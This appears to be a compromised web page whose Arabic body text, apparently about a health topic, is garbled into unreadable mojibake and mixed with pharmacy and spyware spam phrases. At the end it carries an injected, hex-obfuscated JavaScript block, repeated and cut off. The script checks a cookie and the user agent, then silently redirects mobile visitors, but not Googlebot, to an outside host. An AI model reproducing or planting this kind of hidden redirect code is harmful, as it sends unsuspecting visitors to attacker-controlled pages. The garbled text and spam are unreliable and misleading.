Oi??Ui??Ui?? Oi??Ui??O?U?O?USOi?? Oi??Ui??Ui??U?Oi??O?USOi?? U? O?O?Oi??Ui?? Ui??O?Oi??Oi??Oi?? Oi??USO?Oi?? Oi??O?Oi?? Ui??USO? U?Ui??Oi?? Ui??Oi??Ui??Ui?? USUi??U?Ui?? O?O?U?O?USOi?? Ui??U?Oi??O?Ui?? U? Ui??U?Ui?? Ui??Oi??Ui??Ui?? USOi??O?Ui?? Ui??Ui?? Oi??Oi??Ui??Oi?? Oi??Ui??Oi??Ui??O? U? Ui??Oi??Oi??Oi??O?Ui?? Oi??USOi??Oi?? Oi??USOi?? USO?Ui?? Oi??Ui??Ui?? Ui??Oi??Ui??U?O?Oi?? Ui??Ui?? Oi??Ui??U?USO?Oi??Ui??USUi??Oi??O? Oi??Ui??Ui??Ui??Ui??Oi?? U? Oi??Ui??Oi??Oi??Ui??Oi??Oi?? Oi??Ui??Oi??Ui??USUi??USOi?? U? O?Oi??O?Ui??U? Ui??U?U?Ui??Oi??O? O?Ui??U? Oi??Ui??Ui??U?Oi??O? Oi??Ui??Oi??USO?Ui??USOi?? U? O?Oi??U?USO?Ui??Oi?? Oi??O?O? Oi??Ui??Ui??U?Oi??Ui?? Oi??Ui??Ui??O?Oi??Ui??Oi?? U? Oi??Ui??O?O?O? U?Ui?? Oi??Ui??Oi??O?Ui??Oi??Oi??Oi??
O?U?O?USOi?? Oi??Ui??O?O?Oi??Oi?? O?Oi??O?O?Oi??O?Oi??Ui?? Oi??Ui??Oi??Ui??U?O?Oi??Oi??USU?Ui??
O?Oi??O?Oi?? Ui??Oi?? O?U?Oi??Ui?? Oi??Ui??USUi?? Oi??Ui??O?Ui??Ui?? Ui??Ui?? U?O?Oi??Oi??Ui?? O?U?O?USOi?? U? O?U?Oi??USO? Oi??Ui??Ui??U?Ui?? O?Oi??Oi??USUi??Oi?? Oi??Ui??Ui??Oi?? O?Ui?? Ui??U?USO?Oi?? Oi??USOi??Oi?? Ui??Ui??Oi??O?Ui?? U? Ui??Ui??Oi??Oi??Oi?? O?Oi??U?Oi?? O?Oi??Ui??Oi?? Oi??USOi?? USO?O?Ui?? Oi??Ui??USUi?? Oi??Ui??U?O?USOi??O? U? Oi??Ui??Ui??O?Oi??O? O?Ui?? U? Oi??Ui??Oi??Oi??Oi??Ui?? Oi??USOi??Oi??, Oi??O?Ui?? Ui??Ui?? Ui??Oi?? USO?Oi??Ui??U?Ui?? Ui??Ui?? Oi??Ui?? Ui??O?Oi??U?Ui?? Oi??Ui??O?USOi?? Oi??U? O?Oi??O?O?Oi??O? Oi??U? Oi??O?Ui??Oi??Oi??Oi?? Ui??O?Oi??Oi?? Ui??U?U?Oi??Oi??O?Ui?? Oi??Ui??Ui??Oi??Oi??Ui??Oi?? U? Oi??Ui??Ui??O?O?O?O?Oi?? U?Ui??U? Ui??Oi?? USO?Oi??Ui??Oi?? Oi??Ui??O?Ui??O? U? Oi??Ui??Ui??U?Ui?? Oi??Ui??O?Oi??Ui??Ui?? U?Ui??Oi?? O?Ui?? USUi??U?Ui?? O?O?Ui??O?USUi?? Oi??Ui??Oi??O?Ui?? U? Oi??Oi??O? Oi??Ui??O?Ui??U?Ui?? U? Oi??Ui??O?U?Oi??Oi??O? Ui??Ui?? Oi??Ui??Oi??O?Ui?? U? USO?Oi??Ui?? Oi??Ui??Oi??Ui??O? Ui??Ui??O?Oi?? U? Ui??Oi??Oi??Oi??Oi?? Ui??Oi??Ui?? O?O?Oi??Oi?? Oi??Ui??Oi??Oi??U?Oi??Ui?? Oi??USOi?? Oi??Ui??Ui?? Ui??Ui?? Oi??Ui??U?Ui?? Ui??Oi??Oi??O?Oi??O? Oi??Ui??Oi??U?O?O?Oi??.
Oi??Ui??Oi??Ui??U?O?Oi??Oi??USU?Ui?? USUi??U?Ui?? Oi??Oi??Oi??Ui?? O?Oi??Ui?? Oi??U? U?Oi??USO? Oi??U? U?O?O?U?Ui??Oi??O? O?Ui?? Oi??Oi??USUi?? Oi??Ui??U?Ui?? U? Ui??Ui??Oi??U?Ui??U?O? Oi??Oi??Oi?? Ui??Ui?? Oi??Ui??Oi??Ui??Ui?? U? Ui??U?Ui??Ui?? Ui??O?U?O?USOi?? Oi??Ui??Oi??O?Ui?? O?Oi??Ui??U?Oi??Ui??Ui?? U? Ui??USO? Ui??U?Oi??O?Ui??Ai?? U? Oi??Ui?? U?Oi??Ui?? Oi??Ui??USO?Ui??Ui?? Ui??O?Oi??Oi??Oi??Ui??Ui?? Ui??Oi?? O?Ui??Oi??Oi??Ui?? O?Oi??Ui??Oi??Ui??Ui?? Oi??Ui??U?Oi??USO?Ui?? U?Ui??U? Oi??Ui??Oi??Ui??U?Ui?? U?Oi??O?Ui??USOi?? U? Oi??Ui??Oi??U?Oi??Ui?? Oi??O?O?Oi??.
Oi??O?USOi?? O?Oi??Ui??Oi??U?Oi?? Oi??Ui?? Oi??Ui??Oi??Ui??U?O?Oi??Oi??USU?Ui?? O?Oi??U? Ui??Ui??Oi?? U?Ui??O? Oi??U?USUi?? Oi??O?Oi?? U?O?Ui??Oi??Oi?? Ui??Ui??Oi??Oi??Ui?? Oi??Ui??O?Oi??Oi??Oi??Ui?? U? Oi??Ui??U?O?O? U? O?Ui?? O?Oi??Ui??Oi??O?U?Oi?? Oi??U?O?O?Oi??U? U?U?Oi??Oi??O?Ui?? Oi??Ui??Oi??Oi??Oi??Ui??, Oi??Oi??Ui?? U?Ui??U? U?Ui?? Oi??Ui??Oi??Oi??Ui?? Ui??Oi??Oi??O? Ui??Ui??Oi??U?O?O?Oi?? U? Ui??U?USO? Oi??O?Oi?? Ui??Oi??Oi??Oi?? Oi??Ui??Oi??O?Ui?? O?Oi??Ui??Oi??
U? Ui??U?Ui??Ui?? U?Ui??Oi?? Oi??U?Oi??Ui??Oi?? O?Ui?? Oi??Ui??USO? U?O?Oi??Oi??Ui?? Oi??Ui??O?U?O?USOi?? Oi??Ui??Ui??Ui?? Oi??Ui??USO?Oi?? Ui??Oi?? USUi??U?Ui??U?Ui?? O?O?O?USUSOi?? Oi??O?USO?Oi?? Ui??U?Ui?? Oi??Ui??Oi??Ui??O? Ui??Ui?? Oi??O?Ui??Oi?? Oi??Ui??Ui?? Oi??Ui??Oi??O?USOi?? U? Ui??U?Ui?? USUi??U?Ui??U?Ui?? O?Oi??Ui??O?U?O?USOi?? U?Ui??Oi?? O?Oi??Oi??Oi?? Oi??U? Oi??Oi??Ui??USUi?? O?Ui??Ui?? Oi??Ui??Oi??U?Oi??Oi?? U? Ui??U?Ui?? Oi??Ui??U?Oi??Oi??O?Oi?? Oi??Ui??Oi??U?O?Oi?? Ui??Ui?? O?U?Oi??USO? Oi??Ui??Ui??U?Ui??

O?U?O?USOi?? Oi??Ui??O?O?Oi??Oi?? O?Oi??O?O?Oi??O?Oi??Ui?? Oi??Ui??Oi??Ui??U?Oi??Oi?? Oi??Ui??U?Oi??USO?O?Oi??Ui??USOi?? U? Oi??Ui??Ui??Oi??O?USOi??
U? Oi??Ui??O?Ui?? O?O?USUi?? O?Ui??Ui?? Oi??Ui??U?U?Oi?? Oi??Ui??Oi??Ui??O? Oi??Ui??Ui??USO? Oi??Ui??Ui??O?Oi??Oi??U?Ui?? O?Ui??Ui?? O?Oi??Oi?? Oi??Ui??O?O?Oi??Oi?? U? USO?O?O?Oi?? Oi??Ui??Oi??O?Oi??O? U? USO?Oi??Ui?? Ui??O?Oi??Oi??Oi?? U?U?Oi??USOi?? U?Ui??U? Ui??Ui??Oi??O?O? Oi??O?Oi?? U?Ui?? Oi??Oi??Ui??Oi?? Oi??Ui??Ui??Ui??Oi??O?O?Oi??O? Oi??Ui??O?Oi??USO?Oi??
U? Ui??U?Ui?? O?O?Oi??USOi??Ui?? Ui??Oi?? USO?U?Ui?? Oi??U?USUi??Oi?? Oi??USOi?? Oi??Ui??Ui?? USO?Ui??Ui?? U?Ui??Oi?? O?Ui??Ui?? Oi??O?Ui??Oi?? O?Oi??Oi??USOi?? Oi??O?Oi?? Ui??Ui?? Oi??Ui??Oi??Ui??O?.

U?Oi??USUi??Oi??O? O?U?O?USOi?? Oi??Ui??O?O?Oi??Oi??
O?O?O?O? Oi??Ui??U?Oi??O?Ui??Oi?? U? Oi??O?O?Oi??O?Oi??Ui??Oi??O?Ui??Oi?? U? Oi??O?Ui??Oi?? Oi??Ui??Ui??U?Oi??O? Oi??Ui??Ui??O?O?Oi??O?Ui??Oi?? O?Ui??Oi?? Ui??Ui?? Oi??Ui??Ui??USOi??O?Oi??U?U?USUi??U?Ui?? U?Ui??U? Oi??Ui??Oi??Ui??U?Ui?? U? Ui??U?Ui?? USOi??O? Oi??O?O?Oi??O?Oi??Ui??Ui?? O?Oi??Oi??Oi?? U? O?Oi??O? Oi??O?Oi??Oi??U? Oi??Ui??Oi??O?USO? Ui??Ui??O?Oi?? Ui??Oi?? O?O?USO? O?Ui?? 3 Oi??O?Ui??Oi??. U? USU?Oi??O? Ui??Ui??Ui?? O?Oi??U?USO?Oi??Ui?? 2% U? 4% U? Ui??U?Ui??Ui?? Ui??Oi?? USUi??Oi??O?O? Oi??Ui??USO? Ui??Ui??Oi??Oi??Ui?? Oi??Ui??Oi??O?Ui??
Oi??Ui??U?U?Oi??USU? Oi??O?USO? U? Oi??Ui??Oi??Oi??O?USU?O?USUi?? U? Ui??U?Oi??O? O?O?USO?Oi?? Oi??Oi??Oi??Ui?? O?O?Oi??Ui?? U?Ui?? Oi??Ui??Oi??O?Oi?? U?Oi??USUi??Oi??O? Oi??Ui??O?U?O?USOi??, U?Ui?? Oi??O?O? Oi??O?O?Oi??O?Oi??Ui??Ui?? U? U?O?USU?O?Ui??
O?Oi??O?Oi?? USUi??Oi??O? Oi??Ui??Oi??Oi??O?Oi??O? Oi??Ui??Ui?? Oi??Ui??O?Ui??Oi?? O?USUi?? O?O?Oi?? O?Ui??Oi??Oi??Oi??O? Oi??Ui??O?Oi??O?Ui?? Oi??U?Oi??Ui??Oi?? Oi??O?O? Oi??Ui??Oi??Oi??Ui??Oi??

O?U?O?USOi?? Oi??Ui??O?O?Oi??Oi?? O?Oi??Oi??Ui?? Oi??O?USO?USOi??

Ui??O? O?O?Oi??O?O? U?Ui?? O?Oi??O?USUi?? O?O?Oi?? Oi??Ui??Oi??Oi??Ui??Oi??O? O?Oi??Ui??O?O?Oi??Ui??Ui?? Ui??O? Oi??Ui??O?Ui??Oi??Oi??Oi??O? Oi??Ui??Oi??O?USOi?? Oi??Ui??O?O?Oi??O?USOi??
U?Ui??Ui??Oi?? Oi??Ui??O?Oi?? U?Ui?? Oi??Ui??USO? Oi??Ui??U?Oi??U?Oi??O? (Oi??Ui??Ui??USUi??U?Ui??) Ui??USO? U?Ui??Oi?? Ui??Oi??Ui??Ui?? USOi??O?U?Ui?? O?Ui??Ui?? U?USO?Oi??Ui??USUi?? O?Ui?? U? Oi??Ui??Ui??O?Oi??U?U? O?Ui??U?O?Ui?? U?Ui?? O?U?O?USOi?? Ui??U?Ui?? Oi??Ui??Oi??Ui??O? U? Ui??U?Ui?? Oi??USOi??Oi?? Ui??U?U?Ui??Ui?? O?Ui??Ui?? U? O?Ui??Oi??U?Oi?? O?Ui??Ui?? U?U?Oi??Oi??O?Ui?? U?Ui?? Ui??Oi??Oi??Oi??Oi?? Oi??Ui??O?O?Oi??Oi?? U? O?Ui??Ui??USO?Ui??Oi?? Ui??Ui?? Oi??Ui??O?Ui??U?Ui?? U?Ui??U? USO?USUi?? Oi??Ui??Oi??Ui??O? Oi??Ui??Ui??USO? Oi??USOi??Oi??.
Ui??Ui??Oi??U?O?Oi?? : O?O?Oi?? Oi??Ui??U?Oi??O? Oi??Ui??O?O?Oi??Oi?? Ui??O? USOi??O?Oi?? Ui??Ui??Oi?? O?Ui??USUSOi?? Ui??Ui?? U?Oi??O? Oi??Ui??Ui??USUi??U?Ui?? Ui??O?Oi??O?Oi??Oi?? O?Ui??Ui?? Oi??Ui??Oi??Ui??O? U? Oi??Oi??Oi?? Oi??O?Oi?? Oi??Ui??U? USOi??O? O?Oi??U?Ui?? U?U?Oi??Oi?? U? U?Oi??O? Oi??Ui?? U?Oi??USUi?? Ui??Oi??Oi??O? Ui??Ui??Oi??Ui??O?Ui??Oi??O?
Oi??Ui??Oi??O?Oi??USUi?? U? U?USUi??Oi?? USUi??Ui?? O?O?Oi?? Oi??Ui??U?Oi??U?Oi??O? Oi??Ui??Oi??O?USO?USOi?? Ui??O?U?O?USOi?? Ui??Ui??Oi??Oi??Ui?? Ui??Oi??O?Ui??U?Oi?? Ui??Ui?? Oi??Ui??O?O?Oi??Oi?? :-

 • U?Oi??U?Oi?? Oi??O?USO?USOi?? Ui??O?U?O?USOi?? Oi??Ui??Oi??O?Oi??USUi?? USUi??U?Ui?? U?Oi??U? Oi??Ui??Oi??Ui??O? O?Oi??Ui??Ui??USUi??U?Ui?? Ui??O? Oi??Ui??Ui??O?Oi?? U? USO?Oi??U? Ui??O?Oi??O? O?Ui??Oi??Oi??Ui?? Oi??Ui?? USO?Oi??U? U? O?U?Oi??Oi?? USU?Ui?? O?O?O? USU?Ui?? Oi??O?Ui?? O?O?O?Oi??USUi?? O?U?Oi??Ui??. U?Ui??Oi??USUi??U?Ui?? Oi??USOi??Oi?? U?Oi??O? Oi??Ui??Ui??USUi??U?Ui?? Ui??O? Oi??Ui??O?O?Ui?? Ui??Ui??O?Oi?? Oi??O?O? O?Oi??O?Oi?? Oi??Ui?? USO?Oi??U?.

 

 • U?Oi??U?Oi?? Oi??O?USO?USOi?? Ui??O?U?O?USOi?? Oi??Ui??Oi??U?O? U? Oi??Ui??U?U?O?USUi?? : Oi??Oi??Ui??Oi??Ui?? Oi??Ui??O?U?Oi?? Oi??Ui??Oi??O?Ui?? Ui??O? Oi??Ui??Ui??Ui??Oi?? Oi??Ui??Oi??O?Ui?? (Ui??Ui??Oi?? Oi??Ui??O?Oi??Oi??) U? O?O?Oi?? Ui??Oi??Oi??Oi??O? Oi??Ui??Ui??USUi??U?Ui?? U? O?USO? Oi??Ui??O?USO?U?Ui?? U? USU?Oi??U? O?Ui?? Oi??Ui??Oi??Ui??O? Ui??Ui??O?Oi?? Oi??O?O? O?Oi??O?Oi?? Oi??Ui?? USO?U?U? U? USU?Oi??O? O?O?O?Ui?? Ui??O?Oi??O?Oi??Oi?? U?Oi??USUi?? Ui??Oi??Oi??O? U? USU?Oi??Ui?? Oi??Ui??U? Oi??Ui??Oi??Ui?? USOi??O?U?Ui?? O?Ui??Ui?? Oi??Ui??USU?Oi??USOi?? , U?Ui??U? Ui??Ui??O?Oi??O? Ui??Ui??Oi??O?USUi?? Oi??Ui??Ui??Ui??Oi??Ui??O?USUi??. USUi??U?Ui?? Oi??USOi??Oi?? U?Oi??Ui?? Ui??O?Oi?? Oi??Ui??Ui??U?O? Ui??O? Oi??Ui??O?O?Ui?? U? Oi??Ui??Ui??O?Ui?? U? U?Oi??O?Ui??Ui?? U?Ui??Oi??O?U? Ui??Oi??O?O? O?Oi??O?Oi?? Oi??Ui?? USO?Oi??U?
 • U?Oi??U?Oi?? Oi??O?USO?USOi?? Ui??O?U?O?USOi?? Ui??U?Ui?? Oi??Ui??Ui??Ui??Oi??Oi??Ui?? Oi??Ui??Oi??O?Oi??O?Oi?? : USUi??U?Ui?? U?Oi??O? O?USO? Oi??Oi??Ui??O?USO?U?Ui?? Ui??O? Oi??Ui??O?O?Oi??O?Ui?? Ui??Ui??O?Oi?? Ui??Oi??U? O?Oi??O?Oi?? U? O?U?Oi??Oi?? USU?Ui?? O?O?O? USU?Ui?? Ui??Ui??O?Oi?? Oi??O?O?U?O?USUi??
 • Order himcocid himalaya Gps spy, Spy on iphone.

 • U?Oi??U?Oi?? Oi??O?USO?USOi?? Ui??O?U?O?USOi?? Ui??U?Ui?? Oi??Ui??Oi??Ui??O?Oi?? : Oi??O?Ui?? O?O?Oi?? Oi??Ui??Ui??O?Oi?? U? Oi??Ui??Ui??USUi??U?Ui?? U? Oi??Ui??O?O?Oi??O?Ui?? Oi??O?O? O?Oi??O?Oi?? Oi??Ui?? USO?Oi??U?Oi??Ui??USO?USUi?? : Oi??Oi??Ui??Oi??Ui?? Oi??Ui??Ui??O?Ui?? Oi??Ui??O?U?O?Oi??Oi?? Ui??O? Oi??Ui??Ui??USUi??U?Ui?? U? Oi??Ui??Ui??O?Oi?? Oi??Ui??Ui??Oi??Oi??O? U?Ui?? Oi??Ui??Ui??Oi??O? Oi??Ui??O?Oi??U?Ui??O? U? USU?Oi??O? O?Ui??Ui?? Ui??USOi??Oi?? Ui??Oi??O?U? Oi??O?Ui?? USOi??U? Oi??Ui?? USU?Oi??U? Ui??O?O?O?Oi??Ui?? O?Oi??Ui??U?Oi??Ui?? U?Ui?? U?Ui??O?Ui??Oi??.
 • U?Oi??U?Oi?? Oi??O?USO?USOi?? Cialis Professional online Ui??O?U?O?USOi?? Oi??Ui??U?Oi??Ui?? : Oi??Ui??Oi??Ui??USOi??Oi?? Ui??O? Oi??Ui??O?U?Oi?? Oi??Ui??Oi??O?Ui?? U? Oi??Ui??Ui??USUi??U?Ui?? U? USU?Oi??U? O?Ui?? Oi??Ui??Oi??Ui??O? O?Oi??U?Ui?? Oi??Ui?? USO?Oi??U?
  USUi??U?Ui?? Oi??USOi??Oi?? U?Oi??O? Ui??Oi??O?U? Ui??Ui?? Oi??Ui??Oi??Ui??Oi??Oi??Ui?? Oi??U? Oi??Ui??U?Oi??Oi??U?Ui??Oi?? U?Ui??U? Ui??Oi??O?U? Ui??Oi??Oi??Ui??Ui?? Ui??Oi??Oi??Oi??Oi??O? Oi??Ui??O?O?Oi??Oi?? Oi??Ui??O?Ui??Ui??USOi?? U? Ui??Oi??Oi??Ui?? Oi??O? Oi??Ui??O?O?Oi??O? Ui??Ui??Oi?? Ui??Ui??Ui??Oi?? Ui??Ui?? Ui??O?Oi??Oi?? Ui??Oi??Oi??Ui??Oi?? O?Ui??Ui?? Ui??O?Oi?? Oi??Ui??Ui??O?Oi??Ui?? U? O?Ui??Ui??USUi?? Oi??Ui??Oi??U?Oi??Oi??O?Oi??O? Oi??Ui??O?Ui??Ui??USOi??, Ui??Oi??Oi?? USU?Oi??Ui?? Oi??Ui?? USO?Oi??Ui??O?Ui?? Oi??Oi??Oi??Oi??O? Oi??Ui??O?O?Oi??Oi?? Oi??Ui??Oi??Oi??U?Ui??.
 • U?Oi??U?Oi?? Oi??O?USO?USOi?? Ui??O?U?O?USOi?? Ui??U?Ui?? U?Ui?? Oi??Ui??Oi??O?Ui??Ai?? : Oi??Ui??Ui??O?Oi?? Ui??O? O?U?O?Oi??Oi?? Oi??Ui??Oi??Oi??U?Oi??Ui?? U? O?USO? Oi??Ui??Ui??U?O? U? Oi??Ui??Oi??Ui??USO?Oi??USUi?? U? O?USO? Oi??Ui??Ui??U?O? U? O?O?O?O?Oi?? U?Oi??U?Oi?? O?Ui??Ui??Oi?? U? Ui??Oi??USU?Oi?? Ui??Ui??Oi??Ui??O? Oi??Ui??Oi??O?Oi??O? .

U? O?Oi??USOi??Oi?? USOi??O? Oi??Ui??Oi??U?Oi??O? O?Ui??Ui?? O?Oi??Oi??USO? Oi??Ui??O?O?Oi??Oi?? U? O?O?Ui?? Oi??Ui??Oi??Oi??O?Ui??Oi??O? O?Oi??O?O?O?Ui??Oi??Ui?? U?Oi??USUi??Oi??O? O?U?Ui?? Oi??Ui??Oi??O?O?O?Oi??Ui??Oi?? O?Oi??O?USO?.

Ui??Ui??Ui??O?USO? Ui??Ui?? Oi??Ui??O?U?Oi??Oi??USUi?? U? U?Ui?? Oi??Oi??Ui??Oi?? Oi??Ui??Oi??O?O?Oi?? U?Ui?? Oi??Oi??Oi?? Oi??Ui?? O?Oi??Oi??Ui?? Oi??U? Oi??O?O?U?O?Oi??Oi?? USUi??U?Ui??U?Ui?? Oi??Ui??O?U?Oi??Oi??Ui?? Ui??O? U?Oi??O?O?Oi?? Oi??Ui??Ui??Ui??Oi??Ui?? Oi??Ui??O?U?O?U?Oi??Oi?? O?USUi??Oi??O? Oi??Ui??O?O? O?Ui?? Oi??Oi??USUi?? Oi??Oi??Oi??U?Oi?? O?O?Ui??USUi?? O?O?U?Ui?? Oi??Ui??Ui??Ui??Oi??Ui?? U? O?O?Ui??U?Ui?? Oi??Ui??O?U?O?U?Oi??Oi?? O?USUi??Oi??O? Oi??Ui??O?O? O?Oi??Ui??Oi??O? O?Ui??US Oi??O?O?U?O?Oi??Oi??O?U?Ui?? U? Oi??Ui??Oi??Oi??Oi??O?Oi?? O?Ui??Ui?? Oi??O?Oi??Ui??O?U?Ui?? ..

 

Ui??O? O?Ui??Ui??USOi??O?Ui??Oi?? Ui??U?Ui?? O?Oi??Ui??Oi??Oi??Oi?? U? Oi??Ui??O?O?Oi??O?Oi??

Ai?? acquire nolvadex var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v 